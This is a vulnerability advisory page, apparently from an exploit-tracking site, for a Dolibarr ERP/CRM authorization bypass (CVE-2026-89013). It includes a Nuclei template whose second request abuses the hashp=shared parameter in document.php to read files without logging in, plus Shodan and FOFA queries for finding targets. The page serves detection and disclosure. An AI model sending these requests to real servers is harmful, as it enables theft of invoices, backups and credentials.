CVE-2026-89013: Dolibarr < 24.0.0 - Authorization Bypass via hashp Parameter
2026-09-28UnknownPoC Public
Description
Dolibarr ERP/CRM versions 23.0.4 through 24.0.0 contain an authorization bypass vulnerability in document.php and viewimage.php. The public share-link feature forces NOLOGIN when hashp is present, but the value 'shared' skips token resolution while the override still fires for any non-empty hashp value. This bypass allows unauthenticated remote attackers to read arbitrary files from all Dolibarr managed directories including logs, SQL database backups, invoices, contracts, user vcards, and custom module sources.
PoC
id: CVE-2026-89013
info:
name: Dolibarr < 24.0.0 - Authorization Bypass via hashp Parameter
author: DhiyaneshDk
severity: high
description: |
Dolibarr ERP/CRM versions 23.0.4 through 24.0.0 contain an authorization bypass vulnerability in document.php and viewimage.php. The public share-link feature forces NOLOGIN when hashp is present, but the value 'shared' skips token resolution while the override still fires for any non-empty hashp value. This bypass allows unauthenticated remote attackers to read arbitrary files from all Dolibarr managed directories including logs, SQL database backups, invoices, contracts, user vcards, and custom module sources.
impact: |
Unauthenticated remote attackers can read arbitrary files from all Dolibarr managed directories, potentially exposing database credentials, invoices, contracts, and other sensitive data.
remediation: |
Upgrade Dolibarr to version 24.0.1 or later.
reference:
- https://github.com/Faceless0x7/CVE-2026-89013
- https://github.com/Dolibarr/dolibarr/commit/cd05688dbed8a4af6eef32faf4fc1e823a37bce9
- https://github.com/Dolibarr/dolibarr/commit/a8bc4a63e1b6356884abcd83c4a38954d9649b0b
- https://github.com/Dolibarr/dolibarr/commit/3bd8aa8b909e596d7dab4388d0466ec24e6ad191
- https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
- https://www.vulncheck.com/advisories/dolibarr-authorization-bypass-via-hashp-parameter-in-document-php
- https://previdian.com/CVE-2026-89013
- http://nvd.nist.gov/vuln/detail/CVE-2026-89013
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-89013
cwe-id: CWE-863
metadata:
verified: true
max-request: 2
vendor: dolibarr
product: dolibarr
shodan-query: http.title:"Dolibarr"
fofa-query: app="Dolibarr"
tags: cve,cve2026,dolibarr,auth-bypass,file-read,kev,vkev
variables:
canary: "{{rand_text_alpha(16)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
internal: true
dsl:
- 'contains(body, "Dolibarr") || contains(body, "main_login") || contains(body, "dol_login")'
- 'status_code == 200'
condition: and
- raw:
- |
GET /document.php?hashp=shared&modulepart=medias&file={{canary}}.canary HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "{{canary}}")'
- '!contains_any(body, "Bad value for parameter hashp", "Missing identification to find file", "main_login")'
condition: and
# digest: 4b0a004830460221008da88496ed1644409fcafde45b22dc703d0002708e117a8da0102efe0b42e15202210099b33c03b7fb74504d868d47a8cdd4f3a5bae992ac90cff22f6b0128b925c522:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.